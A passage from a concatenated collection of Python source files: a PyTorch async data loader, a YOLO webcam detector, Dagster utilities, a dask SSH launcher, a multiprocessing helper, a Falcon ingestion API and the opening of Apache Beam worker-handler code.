# Can only do asynchronous transfer if we use pin_memory
if not sample.is_pinned():
sample = sample.pin_memory()
return sample.to(self.device, non_blocking=True)
elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
and elem_type.__name__ != 'string_':
if elem_type.__name__ == 'ndarray' \
and self.np_str_obj_array_pattern.search(sample.dtype.str) is not None:
return self.load_instance(sample)
return self.load_instance(torch.as_tensor(sample))
elif isinstance(sample, container_abcs.Mapping):
return {key: self.load_instance(sample[key]) for key in sample}
elif isinstance(sample, tuple) and hasattr(sample, '_fields'): # namedtuple
return elem_type(*(self.load_instance(d) for d in sample))
elif isinstance(sample, container_abcs.Sequence) and not isinstance(sample, string_classes):
return [self.load_instance(s) for s in sample]
else:
return sample
def __iter__(self) -> "AsynchronousLoader":
# We don't want to run the thread more than once
# Start a new thread if we are at the beginning of a new epoch, and our current worker is dead
if_worker = (not hasattr(self, 'worker') or not self.worker.is_alive()) # type: ignore[has-type]
if if_worker and self.queue.empty() and self.idx == 0:
self.worker = Thread(target=self.load_loop)
self.worker.daemon = True
self.worker.start()
return self
def __next__(self) -> torch.Tensor:
# If we've reached the number of batches to return
# or the queue is empty and the worker is dead then exit
done = not self.worker.is_alive() and self.queue.empty()
done = done or self.idx >= len(self)
if done:
self.idx = 0
self.queue.join()
self.worker.join()
raise StopIteration
# Otherwise return the next batch
out = self.queue.get()
self.queue.task_done()
self.idx += 1
return out
def __len__(self) -> int:
return self.num_batches
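# A minimal usage sketch, assuming a CUDA device is available (illustrative only; the
# TensorDataset and batch_size below are placeholders, forwarded to the internal DataLoader).
if __name__ == "__main__":
    from torch.utils.data import TensorDataset
    _dataset = TensorDataset(torch.randn(256, 3))
    _loader = AsynchronousLoader(_dataset, device=torch.device('cuda', 0), batch_size=32)
    for _batch in _loader:
        # each tensor in the collated batch has already been moved to the GPU
        assert _batch[0].device.type == 'cuda'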
|
GoldBagDetectorGUI.py
|
"""
Gintaras Grebliunas
combinacijus@gmail.com
This script draws bounding box around gold bag and calculates
center position of the box
NOTE: Before use update DIR_MODEL and DIR_CONFIG
"""
from imageai.Detection.Custom import CustomObjectDetection
import cv2, time
import queue
import threading
DIR_MODEL = "detection_model-ex-58--loss-1.79.h5"
DIR_CONFIG = "detection_config.json"
class BufferlessVideoCapture:
"""
    Reads frames on a background thread and discards stale ones
    so that read() always returns the most recent frame
"""
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(frame)
# print("t: {:.7f} FRAME".format(time.time()))
def read(self):
# print("t: {:.7f} READ FRAME".format(time.time()))
return self.q.get()
# Find usb webcam
# cap = None
# cap_i = 0
# for i in range(1, 11):
# try:
# print(i)
# cap = cv2.VideoCapture(i)
# _, frame = cap.read()
# cv2.imshow("aa", frame)
# cv2.destroyAllWindows()
# cap_i = i
# break
# except Exception:
# pass
# Use IP camera
cap = BufferlessVideoCapture("http://192.168.8.102:4747/video")
detector = CustomObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setJsonPath(DIR_CONFIG)
detector.setModelPath(DIR_MODEL)
# detector.loadModel()
start_t = time.time()
num = 1
while cv2.waitKey(1) != ord('q'):
    # Timing
end_t = time.time()
dt = end_t - start_t
debug_str = "Frame: %4d dt: %4.1f ms FPS: %2.2f t: %.4f" % (num, dt * 1000, 1 / dt, time.time())
print(debug_str)
start_t = time.time()
num += 1
try:
frame = cap.read() # Get new frame from camera
# detections = detector.detectObjectsFromImage(input_type="array", input_image=frame,
# output_image_path="image2new.jpg",
# minimum_percentage_probability=50)
# frame_out, detections = detector.detectObjectsFromImage(input_type="array", input_image=frame,
# output_type="array", minimum_percentage_probability=1)
# for det in detections:
# print(det["name"], " : ", det["percentage_probability"], " : ", det["box_points"])
except Exception:
num -= 1
print("Error in detection. Skipping frame")
# break
else:
# Debug text on image
font = cv2.FONT_HERSHEY_SIMPLEX
org = (5, 25)
fontScale = 0.55
color = (0, 0, 255)
thickness = 2
frame_out = cv2.putText(frame, debug_str, org, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow("Gold bag detector", frame_out)
# cv2.imwrite("file%d.jpg" % num, frame_out)
cap.release()
cv2.destroyAllWindows()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
    you encode a configuration file path in a source file and want
    it to be runnable from any current working directory.)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.
    Note: this function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
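# For example, camelcase('hello_world') and camelcase('hello-world') both return 'HelloWorld'.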
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
    '''Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
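# Intended behavior, sketched (illustrative only):
#     d = frozendict({'a': 1})
#     pickle.loads(pickle.dumps(d)) == {'a': 1}   # __reduce__/__setstate__ restore the contents
#     d['b'] = 2                                  # raises RuntimeError("Cannot modify ReadOnlyDict")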
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-a', pipeline_fn_name]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
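# Rough usage sketch (names are illustrative, not from this module):
#     manager = EventGenerationManager(pipeline_events(), PipelineContext)
#     for event in manager.generate_setup_events():
#         handle(event)                    # events yielded before the context object
#     context = manager.get_object()       # the single PipelineContext instance
#     for event in manager.generate_teardown_events():
#         handle(event)                    # events yielded after the context object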
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
def segfault():
'''Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
'''
import ctypes
ctypes.string_at(0)
|
ssh_helper.py
|
"""ssh helper for starting remote dask scheduler"""
from __future__ import print_function, division, absolute_import
import os
import socket
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
import logging
from threading import Thread
from toolz import merge
logger = logging.getLogger(__name__)
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import SSHException, PasswordRequiredException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=20,
banner_timeout=20,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
                + "SSH connection error when connecting to {addr}:{port} "
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ "Retrying... (attempt {n}/{total})".format(n=retries, total=3)
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "{output}".format(output=line)
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
try:
channel.send(b"\x03") # Ctrl-C
except Exception:
break
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(addr, port, ssh_username, ssh_port,
ssh_private_key, remote_python=None):
cmd = "{python} -m autogluon.scheduler.remote.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (
bcolors.BOLD
+ "scheduler {addr}:{port}".format(addr=addr, port=port)
+ bcolors.ENDC
)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(scheduler_addr, scheduler_port, worker_addr,
ssh_username, ssh_port, ssh_private_key,
remote_python=None, remote_dask_worker="distributed.cli.dask_worker"):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--no-nanny"
)
#if not nohost:
cmd += " --host {worker_addr}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
)
label = "worker {addr}".format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
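# Rough usage sketch (addresses, ports and key paths are placeholders):
#     scheduler = start_scheduler("10.0.0.1", 8786, ssh_username="ubuntu",
#                                 ssh_port=22, ssh_private_key="~/.ssh/id_rsa")
#     worker = start_worker("10.0.0.1", 8786, "10.0.0.2", "ubuntu", 22, "~/.ssh/id_rsa")
#     print(scheduler["output_queue"].get())    # remote stdout/stderr lines, prefixed with a label
#     scheduler["input_queue"].put("shutdown")  # any message makes the ssh thread exit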
|
parallelism.py
|
from multiprocessing import Queue, Process
from multiprocessing.pool import ThreadPool
import threading
import traceback
import os
import math
from .j_log import log
import gc
import time
N_CORE = (os.cpu_count() * 3 // 4)
def parallel_exec(f, seq, static_args=None, n_process=None, cb=None):
if static_args is None:
static_args = {}
if n_process is None:
n_process = min(N_CORE, len(seq))
pool = []
queue = Queue()
length = len(seq)
l = math.floor(length/n_process)
lock = threading.Lock()
def process_f(f, seq, seq_id, kwargs, q):
for i in seq_id:
with lock:
try:
r = f(seq[i], **kwargs)
except Exception as e:
                    print('Parallelism ERROR')
traceback.print_exc()
q.put((i, None))
continue
q.put((i, r))
start_id = 0
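    # Split the indices into n_process contiguous chunks; the first (len(seq) % n_process)
    # chunks receive one extra element so every item is covered exactly once.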
for p_id in range(n_process):
end_id = start_id + l + (1 if len(seq)-l*n_process-p_id>0 else 0)
seq_id = list(range(start_id, end_id))
kwargs = dict(f=f, seq=seq, seq_id=seq_id, kwargs=static_args, q=queue)
p = Process(target=process_f, kwargs=kwargs)
p.start()
pool.append(p)
start_id = end_id
if cb is None:
r = [None] * len(seq)
for i in range(len(seq)):
seq_i, result = queue.get(block=True)
r[seq_i] = result
else:
for i in range(len(seq)):
id, r = queue.get(block=True)
if r is not None:
cb(r)
for p in pool:
p.terminate()
p.join()
queue.empty()
queue.close()
gc.collect()
if cb is None:
return r
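# Rough usage sketch (square and offset are illustrative):
#     def square(x, offset=0):
#         return x * x + offset
#     results = parallel_exec(square, list(range(100)), static_args={'offset': 1})
#     # results[i] corresponds to seq[i]; items that raised an exception come back as None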
def intime_generator(gen):
thread = ThreadPool(processes=1)
def read_gen():
return next(gen)
thread_result = thread.apply_async(read_gen)
while 'StopIteration is not raised':
r = thread_result.get()
thread_result = thread.apply_async(read_gen)
yield r
|
api.py
|
"""
A small RPC API server for scheduling ingestion of upstream data and
Elasticsearch indexing tasks.
"""
import json
import logging
import sys
import time
import uuid
from multiprocessing import Process, Value
from urllib.parse import urlparse
import falcon
import ingestion_server.indexer as indexer
from ingestion_server.constants.media_types import MEDIA_TYPES
from ingestion_server.state import clear_state, worker_finished
from ingestion_server.tasks import Task, TaskTracker, TaskTypes
MODEL = "model"
ACTION = "action"
CALLBACK_URL = "callback_url"
SINCE_DATE = "since_date"
class Health:
def on_get(self, req, resp):
resp.status = falcon.HTTP_200
resp.media = {"status": "200 OK"}
class TaskResource:
def __init__(self, tracker: TaskTracker):
self.tracker = tracker
@staticmethod
def _get_base_url(req):
parsed = urlparse(req.url)
return parsed.scheme + "://" + parsed.netloc
@staticmethod
def _validate_create_task(request):
"""
Validate an index creation task.
:return: None if valid else a string containing an error message.
"""
if request == b"":
return "Expected JSON request body but found nothing."
request = json.loads(request.decode("utf-8"))
if MODEL not in request:
return "No model supplied in request body."
if ACTION not in request:
return "No action supplied in request body."
if request[ACTION] not in [x.name for x in TaskTypes]:
return "Invalid action."
if request[ACTION] == TaskTypes.UPDATE_INDEX.name and SINCE_DATE not in request:
return "Received UPDATE request but no since_date."
return None
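    # A request body that passes validation looks roughly like this (values are
    # illustrative):
    #     {"model": "image", "action": "UPDATE_INDEX",
    #      "since_date": "2021-01-01", "callback_url": "https://example.com/done"}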
def on_post(self, req, resp):
"""Create a task."""
raw_body = req.stream.read()
request_error = self._validate_create_task(raw_body)
if request_error:
logging.warning(f"Invalid request made. Reason: {request_error}")
resp.status = falcon.HTTP_400
resp.media = {"message": request_error}
return
body = json.loads(raw_body.decode("utf-8"))
model = body[MODEL]
action = body[ACTION]
callback_url = None
if CALLBACK_URL in body:
callback_url = body[CALLBACK_URL]
since_date = body[SINCE_DATE] if SINCE_DATE in body else None
task_id = str(uuid.uuid4())
# Inject shared memory
progress = Value("d", 0.0)
finish_time = Value("d", 0.0)
task = Task(
model=model,
task_type=TaskTypes[action],
since_date=since_date,
progress=progress,
task_id=task_id,
finish_time=finish_time,
callback_url=callback_url,
)
task.start()
task_id = self.tracker.add_task(task, task_id, action, progress, finish_time)
base_url = self._get_base_url(req)
status_url = f"{base_url}/task/{task_id}"
# Give the task a moment to start so we can detect immediate failure.
# TODO: Use IPC to detect if the job launched successfully instead
# of giving it 100ms to crash. This is prone to race conditions.
time.sleep(0.1)
if task.is_alive():
resp.status = falcon.HTTP_202
resp.media = {
"message": "Successfully scheduled task",
"task_id": task_id,
"status_check": status_url,
}
return
else:
resp.status = falcon.HTTP_500
resp.media = {
"message": "Failed to schedule task due to an internal server "
"error. Check scheduler logs."
}
return
def on_get(self, req, resp):
"""List all indexing tasks."""
resp.media = self.tracker.list_task_statuses()
class TaskStatus:
def __init__(self, tracker: TaskTracker):
self.tracker = tracker
def on_get(self, req, resp, task_id):
"""Check the status of a single task."""
task = self.tracker.id_task[task_id]
active = task.is_alive()
percent_completed = self.tracker.id_progress[task_id].value
resp.media = {
"active": active,
"percent_completed": percent_completed,
"error": percent_completed < 100 and not active,
}
class WorkerFinishedResource:
"""
For notifying ingestion server that an indexing worker has finished its
task.
"""
def on_post(self, req, resp):
target_index = worker_finished(str(req.remote_addr))
if target_index:
logging.info(
"All indexer workers finished! Attempting to promote index "
f"{target_index}"
)
index_type = target_index.split("-")[0]
if index_type not in MEDIA_TYPES:
index_type = "image"
f = indexer.TableIndexer.go_live
p = Process(target=f, args=(target_index, index_type))
p.start()
class StateResource:
def on_delete(self, req, resp):
"""
Forget about the last scheduled indexing job.
"""
clear_state()
def create_api(log=True):
"""Create an instance of the Falcon API server."""
if log:
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
"%(asctime)s %(levelname)s %(filename)s:%(lineno)d - %(message)s"
)
handler.setFormatter(formatter)
root.addHandler(handler)
_api = falcon.App()
task_tracker = TaskTracker()
task_resource = TaskResource(task_tracker)
get_task_status = TaskStatus(task_tracker)
_api.add_route("/", Health())
_api.add_route("/task", task_resource)
_api.add_route("/task/{task_id}", get_task_status)
_api.add_route("/worker_finished", WorkerFinishedResource())
_api.add_route("/state", StateResource())
return _api
api = create_api()
|
worker_handlers.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Code for communicating with the Workers."""
from __future__ import absolute_import
import collections
import contextlib
import copy
import logging
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
from typing import Union
from typing import cast
from typing import overload
import grpc
from apache_beam.io import filesystems
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner.execution import Buffer
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.utils import proto_utils
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
ConstructorFn = Callable[[
Union['message.Message', bytes],
'StateServicer',
Optional['ExtendedProvisionInfo'],
'GrpcServer'
],
'WorkerHandler']
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
